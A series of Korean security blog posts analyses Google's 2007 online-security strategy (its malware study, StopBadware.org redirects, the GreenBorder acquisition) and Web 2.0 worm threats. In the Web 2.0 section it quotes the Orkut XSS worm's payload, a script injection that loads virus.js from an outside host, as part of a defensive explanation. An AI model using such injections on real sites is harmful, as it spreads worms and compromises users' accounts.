위에 언급된 인터뷰 기사 각각에서 보듯이 웹이라는 흐름은 이제 대세가 되었으며 이러한 대세의 바탕 위에서 근본적으로 불완전한 웹이라는 메소드에 대한 보안성을 강화하고 신뢰 할 수 있는 웹으로의 전환을 위해 각각의 IT 서비스 기업들이 노력을 하고 있습니다. 그 근간에는 Process + 병적이랄 수 있는 기술적 전문인력 + 원활한 대외 협조 ( 공격자 들 및 제보자들 ) 세 가지 주요 요인으로 정리가 됩니다. 신뢰할 수 있는 웹은 보안적 이슈에 대해 신속한 대응, 문제점 보완을 할 수 있는 기술적 인력들에 의해 가능해 집니다. 인터넷은 통제가 가능한 메소드가 아니기에 더더욱 기술적인 부분이 중요해 집니다.

 

 

Trustworthy Web

 ( Web이라는 매개체가 이제는 소통의 도구에서 생활의 도구로 격상이 된 지금에 이르러서는 불완전한 Web을 신뢰하고 믿을 만한 도구로 격상을 시키는 것이 절대 화두가 될 것입니다.)

보안 부분이 중점을 기울였던 부분을 종합해 보면 자사의 서비스 ( 대부분 Web ) 보안 부분에 많은 역할을 부여하고 있습니다. 특히 IT 관련된 서비스를 직접 운영하는 곳에는 더 많은 필요성이 있을 것으로 보입니다.

 

Cnet의 인터뷰 기사에서 언급된 IT 서비스 기업들의 주된 특징으로는 자사의 서비스 부분에만 많은 신경을 썼지 사용자를 대상으로 한 보안 서비스 부분에는 상당 기간 무관심 하였던 것이 사실 입니다. 지난 해부터는 해외의 포털 및 서비스 업체들도 백신 배포 등과 같은 Action을 취하고 있지만 악성코드의 발전과 진화 속도를 따라잡지 못하고 있는 실정입니다.  다각적인 방안 모색이 필요한 시점이고 현 시점에서 확인 할 수 있는 부분은 Google의 변화 과정이 흥미로운 이슈를 제공 하고 있어서 어떤 방향으로 변화 되는지 살펴 보도록 하겠습니다. 변화를 할 수 밖에 없는 근본적인 흐름을 적어야만 왜 그렇게 하는지에 대한 이해가 가능해 진다는 판단하에 잠시 변화의 근본 원인을 짚어 봅니다.

 개요글 (http://blog.naver.com/p4ssion/50019586109 )에 몇 개의 구글의 변화 요소들을 적었습니다. 변화요소에 기반하여 다음글 한편에 지향하고자 하는 바를 짧게 정리하겠습니다.

 

* Google의 변화된 움직임을 설명하기 위해 전체의 Trend 변화와 우리가 인지 해야만 될 변화 요소에 대해 사전 설명이 필요했습니다. 그렇지 않고서는 모든 행동들의 의미와 가치를 이해 할 수 없기에 적을 수 밖에 없었습니다.

 

 -- to be continue ( 이미 완성은 되었으나 마음에 따라 올리겠습니다. 참 제멋대로죠 쩝 )

 

Posted by 바다란

안녕하세요. 바다란입니다.

 

오랜만에 뵙습니다예고를 했었지만 쓰고 싶은 의지가 들지 않아서 오랫동안 포스트를 게재하지 않았습니다. 앞으로도 종종 마음 내키는 대로 게재 하도록 하겠습니다. 누구나 할 수 있는 말이나 분석 보다는 독자적인 시각으로 흐름과 동향을 보도록 하겠다는 마음이니 만큼 불규칙적인 게재에 대해 많은 이해를 구합니다.

  

오늘은 구글의 검색 보안과 관련된 흐름에 대한 내용을 간단하게 살펴 보겠습니다. 올해 들어 매우 빠른 행보를 보이고 있어서 한번쯤 분석을 해볼 필요성이 있을 것 같아서 해봅니다.

 

사실 구글 이라는 검색업체에서도 보안적인 이슈에 대해서는 자사의 서비스 부분의 보안적인 요소에 지금까지 신경을 써왔습니다. 그러나 현재의 흐름은 자신의 서비스뿐 아니라 불특정 다수를 겨냥한 공격이 일반화되고 있어서 자신의 서비스에만 문제가 없다고 하더라도 다른 부분에까지 영향을 받을 수 밖에 없는 구조입니다. 또한 불특정 다수에게 설치된 악성코드를 통해 직접적인 서비스에 영향을 받는 구조로 되어 있어서 높은 신경을 쓸 수 밖에 없습니다. 그러다 보니 의사결정도 아주 신속하게 나오고 있는 상태입니다.

 

검색 보안이라는 용어 자체가 조금 애매모호하지만 단순하게는 Client 보안이라고 할 수 있습니다. 간단하게 말씀 드리면 Google의 검색 결과로 추출된 결과물에 대해서 사용자가 사이트 링크에 클릭을 하였을 때 악성코드 감염되는 유형을 차단하기 위함이라 할 수 있습니다.

 

국내의 경우에는 2005년 하반기부터 유명사이트를 해킹한 이후 악성코드를 유포하는 것이 매우 활성화 되었고 현재는 조금 잠잠해 진 것으로 보이는 유형입니다만 해외에는 지난해 말부터 대응 측면에서 본격적으로 시작이 되는 것 같습니다.  흐름상으로 보면 온라인 게임에 대한 공격이 전세계적으로 최초 시도가 되었고 이후 범위를 확장하여 검색 및 IT 서비스 분야의 어뷰징 유형으로 확산 발전 되는 형태로 볼 수 있습니다.

 

IT service 업체에서 가장 중요한 부분은 Service에 대한 신뢰도입니다. 그 신뢰도의 가장 중요한 부분에 Online security가 포함이 되고 향후 중요한 포석으로 활용이 될 것임을 알 수 있습니다.  

사업의 확장은 M&A를 통해 규모를 확장 하고 영역을 확장합니다. 그러나 가장 중요한 신뢰도의 확보는 정확한 검색 알고리즘과 로직을 통해 나타내는 결과 이외에도 Security라는 측면이 중요한 요소가 있음을 이제 구글도 알아가나 봅니다. ( 한편으로는 내부적으로 얼마나 많은 문제들을 겪었을까 하는 생각도 듭니다. 위험에 대한 인지 계기가 없으면 보안이라는 부분은 항상 중요도가 낮은 부분이 됩니다.)

 

주제는 딱 한 줄로 요약 됩니다. 최소한 구글을 통한 악성코드 전파는 차단 하겠다. 나아가서는 악성코드에 대한 문제는 최소한 구글을 통해서는 일어나지 않도록 하겠다는 의지의 피력 정도 되겠습니다.

목적으로는 검색결과에 대한 신뢰도 향상 , 급증하는 보안 위험요소에 대한 대응 정도 될 것 같습니다.

회사 규모에 비해서 스케일이 작아서 좀 실망스럽긴 합니다만..~~

 

그럼 올해  본격적으로 모습을 드러낸 구글의 Online security에 대한 행보를 퍼즐 맞추기 해보도록 하겠습니다. 공식적으로 발표된 이슈만을 가지고 조합을 함으로 무리수가 따를 수 있으나 개인의 예상이라는 측면에서 봐주시면 될 것 같습니다.

 

 

구글의 2007 Security action

 

4 ( Hotbots 2007 ) 악성코드 위험 사이트 발표 ->

4월 말 KISA - Google과 악성코드 탐지 협력 -> 

5 . Greenborder의 인수 ->?

7  postini 이메일 보안업체 인수 -> 이 이슈는  online security와는 아주 조금 관련 될 것으로 예상됩니다.

 

올해들어 처음으로 구글 내부에는 Anti malware라는 조직이 신설된 것으로 알고 있습니다. ( 발표자료 보고 알았습니다.) 해당 조직의 조사에 의해 올해 4월에 있었던 Hotbots 2007 행사에서 450만개의 웹서비스를 대상으로한 악성코드 설치 위험을 지닌 통계를 발표 하였습니다.  

그 결과로 대상인 450만개에서 10% 45만개 가량의 웹서비스에서 사용자에게 영향을 줄 수 있는 악성코드의 위험성이 있다고 발표 되었는데 여기에서 중요한 것은 왜 그 조사를 진행 했으며 무엇을 하기 위해 그 업무를 했느냐가 분석이 되어야 합니다.

 

간략한 참고는 기사화된 내용이 존재 합니다.

http://www.etnews.co.kr/news/detail.html?id=200705140149

 

전문적으로 참고 하실 분은 Hotbots 2007의 컨퍼런스 발표 원문을 보시면 됩니다.

http://www.usenix.org/events/hotbots07/tech/full_papers/provos/provos.pdf

 

Hotbots2007 conference에서 다양한 주제들이 발표 되었으니 관심 있는 분들 참고 하시면 될 것 같습니다.

 

4월 말 경에는 KISA (한국정보보호진흥원) Google의 악성코드 탐지 사이트에 대한 대응 협력도 체결을 한 상황입니다.

http://www.dt.co.kr/contents.html?article_no=2007042502011060713008

 

악성코드 탐지와 관련된 또다른 움직임은  http://stopbadware.org 와도 밀접한 연관이 있습니다.  

 

 

2006년 하반기부터 운영된 사이트로서 구글 검색에서 나온 검색 결과에 대해 링크 클릭시에 악성코드를 유포한다고 보고가 된 사이트에 대한 접근은 stopbadware.org 사이트로 리디렉션 시킵니다. 검색 결과는 보여주되 악성코드를 유포하는 사이트로의 접근은 제한을 거는 것이죠. 여기서 또 트릭이 하나 있는데 검색결과에 대한 링크 허용 요청은 stopbadware.org로 직접 하게 합니다. 이 사이트의 운영은 묘하게도 하버드 법대에서 운영을 하는 것으로 나와 있죠.  항의는 하버드법대에다 진행하고 문제가 해결이 되었다면 stopbadware.org 에서 지워지면 구글도 링크를 허용하겠다 이런 정책으로 보입니다. 좋은 잔머리라고 볼 수 있을 것 같습니다. ^^; 더불어 KISA와의 협력을 통해 보다 더 한국에 특화된 악성코드 대응이 가능해 질 것으로 예상 됩니다.

 

 

Anti malware라는 팀에서의 악성코드 위험성 조사와 더불어 진행된 내용으로는 Greenborder의 인수를 병행하여 추진한 것으로 보이며 5월 말 경에 공식적으로 발표를 합니다. 내부적인 합의는 5월 중순에 완료 되었다고 합니다.

http://www.zdnet.co.kr/news/internet/hack/0,39031287,39157927,00.htm

 

Greenborder의 인수는 왜 이루어 졌을까 하는 의문 당연히 제기 되어야 합니다. 그린보더의 기술은 Firefox IE Browser 내에 가상의 Sandbox 모델을 구축하여 보안을 구현 한다고 되어 있습니다. 정말 어렵게 설명 하죠? 좀 쉽게 설명 하면 다음과 같습니다.

 

모든 웹사이트에 방문을 할 경우에 해당 웹 사이트의 데이터는 개인 PC Temporary 폴더에 저장이 됩니다. Firefox IE든 마찬가지 입니다.  악성코드의 전파는 우선 사이트에 방문 이후 모든 파일이 내려진 이후에 자동 실행등을 통해서 이루어 집니다. 그린보더는 여기에 착안을 하여 비지니스를 진행 합니다.

 

                     <cnet.com greenborder pro2 에 대한 소개 이미지>

 

자세히 들여다 보시면 Browser 테두리를 Green color로 둘러 싸고 있는 것을 볼 수 있습니다. 일단 보호가 되고 있다는 의미를 나타냅니다. 사업의 방향은 간단합니다.  Temporary 폴더로 다운로드 되는 모든 파일에 대해 실행제한을 하게 하고 설치가 되지 않도록 하기 위해  가상화된 공간을 만들고 해당 공간은 시스템에 영향이 없도록 만들어 둡니다. 그 이후 사이트를 떠나거나 브라우저 창을 종료 할 경우 파일의 삭제 혹은 가상화된 공간을 없애는 것이죠.

 

즉 모든 악성코드들의 출발점인 다운로드 이후 실행 경로와의 차단을 목적으로 진행을 합니다만 기본 경로에 대한 차단을 시행하는 역할 을 합니다. 개념상으로는 좋은 아이디어 입니다. 한번 사용을 해봤으면 정확하게 알 수 있는데 구글의 인수 이후 해당 업체를 알게 되었고 다운로드 경로가 모두 삭제되어 사용이 불가하여 웹상에서 드러난 공개자료를 통한 분석 외에는 해볼 수 없었음을 알려 드립니다.

 

이 그린보더의 문제점은 시스템에 대한 보안 적용이 필요한 모든 부분에서 문제를 일으킬 수 있다는 점입니다. 즉 구글을 제외한 모든 사이트들에서 추가적인 도구들을 사용 할 수 없는 문제들이 발생 할 수 있습니다. 이런 문제를 해결 하기 위해서는 앞으로 많은 시간이 필요할 것으로 보이나 해당 업체의 기술을 이용한 검색 결과의 안정성 보장은 빠른 시일 내에 모습을 드러낼 것으로 보입니다.

 

드러난 Google의 행보는 여기까지입니다. 단순하게 세 가지 사실을 가지고 유추해본 바로는 향후 검색 결과에 대한 사용자 신뢰도 확보에 대한 Google의 의지를 볼 수 있고 또한 동양과 서양간의 사회적 인식에 따른 보안 개념의 차이를 볼 수 있습니다.

 

올해부터 보안컨퍼런스에 전면적으로 모습을 드러낸 구글의 모습은 그 필요성에 따라 매우 빠른 움직임을 보이고 있습니다. 그만큼의 위험상황이라고 인식을 하는 것을 볼 수 있습니다. 자사의 검색결과에서 악성코드가 유포되는 유형을 공개적으로 발표를 하는 의도도 그만큼의 위험상황임을 내부에서만 알고 있기에는 위험하다고 판단 했기에 그랬을 것으로 보입니다.

  

* Article이 좀 분량이 있습니다. 계속 올리도록 하겠으며 다음에는 좀더 체계화 되고 전략적인 방향 부분을 짚어 보도록 하겠습니다 2편 정도 더 나올 것 같습니다.

 

감사합니다.

 

 

참고: 동양과 서양간의 사회적 인식에 따른 보안개념의 차이에 대한 사견

 

 - 일반적인 내용은 아닙니다만 사회적 인식에 따라 책임 소재가 국내의 경우 서비스 업체에 집중이 되는 경우가 많습니다. 금융사고의 경우에도 개인 사용자에게 설치된 악성코드로 인해 발생된 사고의 경우에도 금융권에서 배상을 해야 하는 내용등이 있어서 문제 발생 이전에 사전 대응을 주로 하도록 합니다. 수많은 ActiveX가 설치되는 이유 이기도 합니다.

 

서구권의 경우 사고 이후의 분석에 많은 강점을 보이고 있습니다. 즉 사용자에 대한 모든 행위 분석 ( CRM의 일종 )에 따라 비정상적인 행위 패턴을 보일 경우 Alert이 되도록 합니다. 즉 한번도 간적이 없는 곳 또는 사용 기록이 거의 없는 시간대에 거액의 비용을 사용하게 된다면 Abusing이라고 판단하죠. 이걸 Fraud 라고도 합니다. 이런 유형의 검출에 대해 특화된 노력들이 많이 있어 왔습니다.

 

금융권의 예를 들었읍니다만 서비스의 경우에도 개인 사용자야 어찌되든 자신의 서비스로 인해 나타나는 결과의 안정성에만 신경을 쓰는 것을 볼 수 있습니다. Google이 그 케이스를 보여 준다고 생각 됩니다.

 

 

 


 

 
Posted by 바다란

바다란입니다.

 

지난해 초에 Web 2.0의 위협요소와 관련하여 여러 곳에서 발표를 한 내용이 있습니다. 그 PPT의 마지막장에 앞으로 다가올 위험요소들은 무엇이 있을까?에 대한 예상을 게재한 바 있습니다.

그 예상은 다음과 같습니다.

 

 

2007년 2월에 작성한 예상은 지금도 유효하며 향후에도 3~5년 가까이 유효한 예상입니다. 2006년 하반기에도 비슷한 이슈들이 있었으나 분석가들 대부분은 개별 기업의 문제로 치부하고 단편적인 이슈로 취급을 하였습니다. 세계적인 경우에도 비슷합니다. 국내의 경우에는 당연히 기사를 받아다 쓰는 경우 외에는 없었죠.

 

이 예상의 근거는 무엇인가 하면 취약성의 발견과 공격 기법의 변화, 파급효과에 따른 기대치에 따라서 예상이 되었습니다. 보다 많은 대상자에게 공격을 하는 패러다임의 전환기에서 일반 사용자 PC를 공격하기 위한 다양한 Bot 들이 출현 하였다면 이제는 보다 더 대상을 명확하게 규정하고 확실한 효과를 보기 위해서 Web Application worm을 이용한다는 변화가 심각하게 눈에 들어 왔기 때문입니다.

 

앞으로의 예상도 유사합니다.

보다 많은 대상자에게.. 보다 많은 유효한 대상에게 전파를 하고 확실한 효과를 얻기 위한 공격 기법은 계속 될 것이고 이 공격은 Cyber Black market이 존재하는한 ( 향후 몇 십년간 근절될 가능성은 없습니다. 인간의 기본적인 속성상..) 계속 될 수 밖에 없습니다.

 

Web을 통한 악성코드의 유포의 경우에도 일반적으로 국내와 최근의 해외의 경우에는 특정 게임의 계정을 탈취하기 위한 공격들이 많았습니다. 특정 게임의 유저들이 자주 방문하는 사이트를 공격하는 경우가 일반적이였으며 이제는 전체의 대상자를 겨냥한 사이트 공격이 일반화 되어 있습니다. 

 

악성코드의 두 가지 흐름은 Application Attack 관점에서 두 가지 방향으로 볼 수 있습니다. 하나는 위에 언급한 악성코드 유포를 위한 관련성 있는 Web site에 대한 직접적인 공격 ( Application의 Perimeter validation error 부분을 공격 - ex : sql injection, Cross Site Scripting)을 통한 방문자 PC 악성코드 전파 사례와 또 다른 하나는 직접적인 Service 구조를 공격하는 Application Attack이 있을 수 있습니다.

 

첫번째 케이스는 이미 이 블로그에서도 상당부분 지적한 바 있으며 Service에 특화된 공격들도 예를 든 적이 있습니다. Yahoo Messenger에 대한 공격, Myspace에 대한 악성코드 Attack들이 있으며 지난해 12월에 발생된 Google의 orkut ( SNS) 사이트에 대한 공격이 특별한 예가 될 수 있습니다.

 

Orkut에 대한 공격은 하기의 링크를 참조 하시면 일정 수준의 정보를 얻을 수 있습니다.

 

http://www.news.com/8301-10784_3-9836029-7.html?tag=nefd.only

http://www.cgisecurity.com/2007/12/17

 

source code & analysis

 

http://www.marrowbones.com/commons/technosocial/2007/12/orkut_worm_code_and_why_was_go.html
http://ha.ckers.org/blog/20071220/orkut-xss-worm/

 

위와 같이 정보의 확인이 가능합니다. 위의 기사에서 언급 되었듯이 40만명 가까운 유저에게 짧은 시간동안에 Worm이 퍼지는 것을 확인 할 수 있습니다. 관계로 이루어 지는 모든 SNS 사이트들은 동일한 구조를 지닐 수 밖에 없으며 문제를 가지고 있습니다. 이제는 Web을 통한 연결이 일반화 되고 다양한 연결 도구들을 활용 하여 ( AJAX, RSS , ATOM ...) 연결이 이루어짐으로 인해 피해는 특정 서비스에 한정된 모든 사용자들에게 전파가 됩니다.

 

orkut worm에서의 중요 코드는 다음과 같습니다.

"[/silver]<br/><embed src=\"http://www.orkut.com/LoL.aspx\" type=\"application/x-shockwave-flash\" wmode=\"transparent'); script=document.createElement('script');script.src='http://files.myopera.com/virusdoorkut/files/virus.js';document.getElementsByTagName('head')[0].appendChild(script);escape('\"width=\"1\" height=\"1\"></embed>";

 

위의 코드에서 중요한 부분은 사이트 실행시에 전달되는 인자 값에 script가 실행되는 문제가 모든 문제의 시작이라 할 수 있습니다. 전달 되는 인자값에 스크립트가 실행됨으로 인해 스크립트 내의 소스코드들은 orkut의 Friend list를 가져오고 전파하는 유형의 코드들을 볼 수 가 있습니다.  ( 상세 내용은 위에 언급한 URL 내의 소스코드를 일부 분석해 보시면 연관관계 파악이 가능합니다.)

 

지난해 초에 제시한 Next Threat의 특징들에 제시된 내용과 동일함을 볼 수 있습니다.

 

Application Web service worm 이며 특정 서비스에만 국한된 국지적인 영향 ( Google의 orkut) , Ubiquitous Attack ( 유,무선 사용자들에게 동일한 영향을 미침), 더불어 플랫폼에도 국한되지 않는 공격입니다.

대안으로는 여러번 언급 하였으나 모든 Application에 대한 사용자 접근 지점에 대한 Validation check의 일반화 , 사고 발생 이후의 빠르고 역동적인 대응만이 해결책입니다. 이 부분을 처리 하기 위해서는 수준높은 전문가의 활용과 서비스에 익숙한 보안 전문가들의 확보가 필수적입니다. 세계적인 기업들에 Application security 전문가들의 자리는 앞으로도 많이 비어 있을 수 밖에 없습니다. 그만큼 기회도 많고 Risk도 높다는 이야기 입니다. 국내라고 예외 이겠습니까?...

 

많은 IT 서비스 기업들이 보다 더 사용자 접근성을 강화하고 활발하게 하도록 구성이 되고 있는 지금 시점에 해외보다 더 많은 위험들이 존재한다고 볼 수 있습니다. 단지 공격에 대한 기대 효과가 있느냐 하는 가치의 문제 때문에 시도가 되지 않는 것이죠. 일부 대규모 IT 서비스 업체에서는 알게 모르게 Service에 특화된 Attack들이 다수 있었을 것입니다. ( 부정 할 수 있는 서비스 업체가 어디 일까요? )

 

왜 이런 유형들이 발생되고 있고 향후에는 어떻게 될 것인지에 대해서 인지하는 것은 중요합니다. 그러나 그 어느 누구도 중요성을 언급하지 않습니다. 05년 부터 중국발 해킹의 위험성과 파괴력에 대해서 언급 하였으나 세계적인 흐름은 07년에 들어서야 가까스로 피해를 입고 인지하는 수준으로 전달이 되고 있습니다. 그만큼 국내의 환경은 빠르고도 역동적인 기회를 부여합니다. ( 보안전문가들에게..) 더불어 그만큼 가혹한 노력을 요구하는 환경입니다.

 

앞으로의 방향성에 대해서 고민하지 않는 전문가. 생각조차 하지 않는 전문가들은 가치가 없습니다.

치열하게 고민해야 됩니다.

 

 

특화된 Service Attack은 계속 발전할 것이고 사용자 연결 지점의 사소한 문제들도 이제는 전체의 서비스에 영향을 미치는 거대 사안이 될 수 있습니다. 그만큼 중요도가 높아 진다는 것이죠.

변화를 따라 갈 것이냐 리딩 할 것이냐는 마음먹기에 따라 달린 것입니다.

 

올해도 또 이렇게 시작합니다.  앞으로도 많은 관심과 질책을 아낌 없이 주셨으면 합니다. 지난 한해 감사했습니다.

 

- p4ssion is never fade away . 바다란

 

 

 

 

Posted by 바다란
 

 

이제서야 처음 언급한 전략이 나오네요. 전략이라고 해봐야 별 거 없습니다.

뭐 특별하고 신출귀몰한 것도 없고 어느 정도 수준 되면 다 보이는 정도입니다. 이런 흐름을 얼마나 역동적으로 리딩을 하고 끌고 가느냐가 생존을 담보 하겠죠. 앞으로의 세상은 더더욱 그럴 것 입니다. 안주하는 서비스기업들은 무너지겠죠. 한 순간에 녹아 내리듯이 그렇게..

힘겹고 고통스러운 일이지만 그 동안 외면 했던 Security 라는 측면을 하지 않으면 생존하기 힘든 상황이 될 것입니다. 눈에 보이는 것이 아닌 체질적으로 서비스에 내재된 기술적 보안역량이 서비스의 질에 매우 큰 차이를 가져오게 될 것입니다. 앞으로는 보유 여부에 따라 극복하기 힘든 절대적인 차이가 발생하게 될 것입니다.

 

 

 

보안전문가와 보안 관리자의 차이( http://blog.naver.com/p4ssion/50014996901 ) 에서 언급한 GSM (General security manager ) SSM (Special Security manager) 의 구분과 동일합니다. GSM이 아닌 SSM의 보유여부에 따라 향후의 IT 서비스 기업의 흥망성쇠는 달라집니다. 최소한 글로벌 비즈니스를 하는 곳은 그러 합니다.  단지 인력을 확보 하고만 있는 것이 아닌 역량 발휘가 가능한 환경까지도 조성이 되어야만 하는 문제입니다. 국내의 현실은 SSM보다는 GSM이 더 우대 받는 현실이지만 앞으로의 다가올 위협에 뼈저리게 느낄 기회가 주어지게 될 것입니다. 위협에 대한 대응에 있어서 국내에서는 유야무야 얼버무리는 것이 된다 하여도 해외사업에서는 절대 그렇게 되지 않을 것입니다. 그때 가서야 알게 될 것입니다. 후회해도 늦었지만.. (하고 싶은 말들은 있습니다만. 이런 내용은 사설로 나중에  더 가슴에 맺히면 쓰도록 하겠습니다. 꾸벅)

 

1. Google online security 전략 개요

http://blog.naver.com/p4ssion/50019586109

 

2. online security 전략 상세  - * Trustworthy web

                                    * Google security strategy

3. online security의 방향과 미래 ??

 

* Google의 전략

 

- Direction : Passive protection ->Active protection으로의 전환

 

개념상으로 단순한 바이러스의 제거  ( 발생 이후에 제거가 가능한 부분) 서비스의 제공에서 벗어나 올해부터는 본격적으로 Active한 보호를 가능케 하도록 서비스 틀이 변화 될 것을 예상 할 수 있습니다. 1~2년 후에 일반화된 경향이 될 것으로 예측 됩니다.

Active한 보호 방안이란 사용자의 선택에 따른 AV 서비스의 제공이 아닌 악성코드 감염을 원천 차단하고 악성코드 유포 사이트에 대한 사전대응 형식으로 사용자에게 노출되는 악성코드를 적극적으로 줄이겠다는 의사로 풀이가 됩니다.

 

서비스적인 측면에서 Passive Active Protection 두 방안의 조화로운 운영을 통해 문제 발생 부분을 최소화 할 것으로 보이며 프로세스상으로는 다음과 같은 일련의 체제를 갖출 것 같습니다.

 

Active (예방 ) - Passive (대응) - Response ( 관리)

 

Active :

GreenBorder Product를 통한 악성코드 감염의 원천방지 ( 전체 사용은 어려울 것으로 예상)

일부 구글팩 및 구글툴바를 활용한 사용자 선택적인 사용이 중점이 될 것으로 예상됨

 

Passive:

구글팩에 포함된 Symantec AV 백신을 통한 사용자 치료 서비스의 강화 , 향후 다양한 멀티 벤더 제품을 사용하도록 할 가능성이 있음.

 

Response:

Stopbadware.org 사이트 운영을 통한 악성코드 유포 가능성을 지닌 사이트의 검색 결과 격리

stopbadware.org 사이트에 등록이 되는 사이트들은 AV벤더와 협력하여 탐지가 되는 결과를 가지고 진행합니다. 한국의 경우에는 KISA와의 협력을 통한 악성코드 유포 사이트 정보를 활용하여 stopbadware.org 사이트에 등록을 하게 될 것으로 보입니다.

 

위와 같이 세가지 방향에서의 online security가 이루어 지고 있으며 움직임이 본격화 되었다는 것은 security라는 측면이 online business에서 얼마나 중요한 가치를 지닐 수 있는지를 인지했다고 볼 수 있습니다. 내부 보안 강화 및 서비스의 보안 강화의 측면에서 한층 더 나아가 user 단위에 까지 영향을 미치는 security가 가미된 서비스로 방향을 설정한 것이라 봅니다. 그리고 현재의 위협 상황에서는 사용자까지도 보호를 해야만 서비스의 안정성이 유지가 되는 것이 사실입니다.

 

기본개념으로는 secure search search integrity (security 측면에서의 무결성- 악성코드로부터 Free..)으로 흐름분석이 가능 한데 일련의 이슈들을  서술 하면 다음과 같습니다.

 

 

Secure search & Browsing

 

secure search라는 부분은 제가 해석한 부분입니다. 대표적인 예로 올해 상반기에 인수된 Greenborder를 예로 들 수 있습니다. 전편에서 언급 하였듯이 검색 서비스 자체의 보안 측면은 아닙니다. 검색을 통해 노출된 사이트들을 통해 사용자가 피해를 입는 부분을 최소화 하자는 것이 근본 방향이 될 것으로 보입니다. Google을 통해 검색을 하고 그 결과를 클릭 하였는데 악성코드에 감염이 되었다는 문제 제기를 피하기 위한 방안으로 인식이 됩니다.

이 움직임은 올해 초에 구글의 Anti malware 팀에서 조사한 내용을 통해 근본 근거를 마련하고 이후의 Action item으로 Greenborder의 인수를 추진한 것으로 확인이 됩니다.  조사되고 발표된 내용은 전체 검색 결과의 10%가 악성코드 및 위험요소를 가지고 있는 유형으로 파악되었다는 자체 조사 결과 입니다.

 

Greenborder에 대한 설명은 전편에 설명을 하였지만 부가적으로 더 언급을 하면 Secure Browsing을 구글 내에서는 가능하게 하겠다는 근본취지를 지니고 있는 개념으로 볼 수 있습니다.  구글을 통해 검색이된 결과는 사용자가 클릭을 하여 해당 사이트로 이동을 하여도 악성코드에 감염되지 않는 Frame을 만들겠다는 관점에서 볼 수 있습니다.

 

대부분의 웹사이트를 방문할 경우 해당 사이트의 컨텐츠들은 사용자 PC의 임시파일 저장소에 저장이 되어 (cache ) 사용자의 브라우저 화면에 보여지게 됩니다. 대부분의 악성코드들이 감염 시키는 방식이 다운로드 이후 실행을 하는 방식을 취하고 있는데 GreenBorder의 경우에는 이 공간을 격리 시킵니다.

격리라는 의미는 별개의 가상공간에서 다운로드를 받고 사용자의 Browser에 보여지게 한 뒤에 사용자가 해당 사이트 이탈 시에는 가상공간을 없애는 유형으로 악성코드가 사용자 PC에 직접 침입 하는 유형을 원천 차단하는 것을 의미합니다.

 

개념 상으로는 좋은 방향이지만 국내의 현실에서는 문제가 많을 것으로 보이며 문제는 다수 발생 할 것으로 보입니다.

ActiveX 또는 부가 설치가 필요한 모든 부분에 대해 예외 설정 등을 하게 되면 문제는 계속 될 것으로 보이며 향후 구글 툴바 혹은 구글팩에 포함되어 사용자의 선택에 의해 사용하게 되는 유형으로 서비스 될 것으로 예상됩니다.

 

7.11일 현재 구글은 postini 라는 이메일 보안 업체를 6000억원을 주고 인수 합병을 하기로 한 기사가 나왔습니다. 관련 업체의 프로필을 살펴본 결과 기업용 제품으로서 단순한 이메일 보안업체가 아닌 일관된 Policy의 적용 및 내부 정보 유출을 방지하는 서비스 유형으로 파악이 되며 Google의 서비스 측면에서 보았을때 향후 기업용 시장에 대한 진출 도구로서 활용이 되고 Gmail에 대한 서비스 강화, 이익 강화 ( 미국의 3대 이메일 보안 서비스 업체라고 함) 측면에서 보는 것이 바람직해 보입니다.

 

 

Search integrity

 

검색결과에 대한 무결성을 보장한다는 의미는 검색 관련된 서비스를 하는 업체에게는 매우 중요한 factor 입니다. 그동안의 무결성이 검색 결과에 대한 정확도의 측면에서 접근 하였다면 지금은 전체적인 Web상의 위험요소 발달에 따라 다른 부분으로 전이가 되고 있습니다.

 

검색결과에 대한 정확도 측면 + 검색결과에 대한 신뢰도 ( 신뢰도 측면은 사용자 PC에 대한 안정성 측면의 신뢰도 입니다.) 가 이제는 기본적인 흐름으로 대두 될 것입니다. 이런 연유에 따라 구글의 Anti malware 팀에서는 구글 검색 결과 중 10%가 악성코드 유포의 위험성이 있다고 스스로 발표를 한 것으로 볼 수 있습니다. 스스로가 발표를 하면서 위험성이 있다는 것도 사용자들에게 알리고 이런 위험성을 제거하기 위해 사용자의 Action을 제한 할 수 있는 서비스를 출시 하는 것으로 볼 수 있습니다.

 

사용자의 Action 제한을 하더라도 큰 범주에서는 사용자의 보호를 위한다는 당위성 확보로 적절하게 활용이 된 것을 볼 수 있습니다.  구글 서비스에서 이루어지는 빠른 변화에 대한 사전작업이라고 보입니다.

 

Search integrity를 확보하기 위해서는 무엇을 하는가? 하는 측면에서 바라보면 드러난 부분으로는 다음과 같습니다.

Stopbadware.org 사이트의 활용 - 하버드 법대에서 운영을 하도록 합니다.  AV 벤더 및 악성코드 유포를 탐지하는 여러 업체 및 기관과 협력하여 거의 실시간에 가깝게 악성코드가 유포되고 있는 사이트 정보를 획득하고 해당 사이트 정보를 구글의 검색 결과에 반영을 합니다. Black list에 등재된 사이트의 경우 검색 결과에 노출이 되어도 사용자가 클릭을 하면 악성코드 유포 위험성 안내와 함께 stopbadware.org 사이트로 이동을 하도록 하고 있습니다.  관련 업체에서 이의제기를 하고 싶어도 구글 에게 직접 하는 것이 아닌 하버드법대에 이의제기를 해야죠.  blacklist에서 제거 되는 부분도 악성코드 유포 위험요소를 제거한 이후에 되도록 되어 있고 black list에서 제거되면 검색결과는 정상적으로 해당 사이트 링크를 활성화 시켜 줍니다.

 

주변 환경을 이용하는 측면에서 영악하다고도 볼 수 있는데 구글의 정보통제 및 독점에 대한 문제 회피를 위해 하버드 법대를 활용한 개념이 있고 또한 거의 실시간에 가까운 전 세계 협력 기관 및 AV 벤더의 자료를 취합해 적용함으로써 신뢰도를 높이는 점이 있을 것 같습니다. 자료를 제공해주는 기관이나 벤더는 향후 대폭 확대될 가능성이 있을 것이며 확대에 따라 신뢰도는 더 높아지는 결과를 유발 할 것입니다. 2007.7.11자로 확인을 해보니 악성코드 유포 가능성이 있고 유포중인 사이트가 197000여 개 정도 리스트업이 되어 있습니다.  

( http:://www.stopbadware.org )

우리나라의 경우에는 KISA에서 제공되는 악성코드 유포 사이트 정보를 활용하여 보다 전문적이고 지역적으로 특화된 내용에 대해서도 대응이 가능한 체제를 수립하려는 것으로 보입니다.

 

Response 영역에 대해서는 특별히 언급할 내용이 없으며 구글팩의 설치부터 AV 백신의 실행까지 모두 사용자 동의 하에 가능한 부분이라 영향은 제한적이지만 향후에는 위협의 증가에 따라 기본으로 제공될 가능성이 존재합니다.

 

 

Integrity Secure search & browsing에 대한 간략한 개념을 설명 드렸습니다.

 

영향은 어떻게 될까요? 짧은 소견이지만 생각 나는 대로 정리 하겠습니다.

 

Google의 검색 안정성 강화 ( 이익 창출을 위한 필수도구로서의 security factor 인식의 산물)

